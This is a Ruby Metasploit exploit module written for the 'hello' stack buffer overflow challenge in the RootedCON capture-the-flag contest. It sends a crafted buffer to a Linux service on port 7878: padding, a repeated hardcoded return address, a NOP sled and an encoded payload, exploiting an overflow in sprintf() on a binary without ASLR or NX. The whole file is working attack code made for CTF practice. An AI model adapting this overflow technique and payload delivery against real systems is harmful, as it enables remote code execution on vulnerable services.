#
#
# Custom metasploit exploit for RootedCON CTF 'hello' challenge
# Written by Eloi Sanfelix
#
#
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

      include Msf::Exploit::Remote::Tcp
      def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'RootedCON Capture The Flag \'hello\' challenge',
                        'Description'    => %q{ Exploit for the 'hello' exploitation challenge from the
						RootedCON CTF. Simple buffer overflow using sprintf(), 
						no ASLR, no NX, just plain-good-old stack smashing.
                                             },
                        'Author'         => [ 'esanfelix' ],
                        'Version'        => '$Revision: 1.0 $',
                        'Platform'       => 'linux',
			'Arch'		=> ARCH_X86,
                        'Privileged'     => false,
			'Targets'	=>
				[
					[ 'My ubuntu linux', {} ],
				],
			'DefaultTarget'	=> 0
                        ))

                        register_options(
                        [
                                Opt::RPORT(7878)
                        ], self.class)
       end

       def exploit
          connect
          buffer = "A"+ [0xbffff380].pack('V')*80 + "\x90"*300 + payload.encoded
	  sock.put(buffer)
	  disconnect
	  handler
       end

end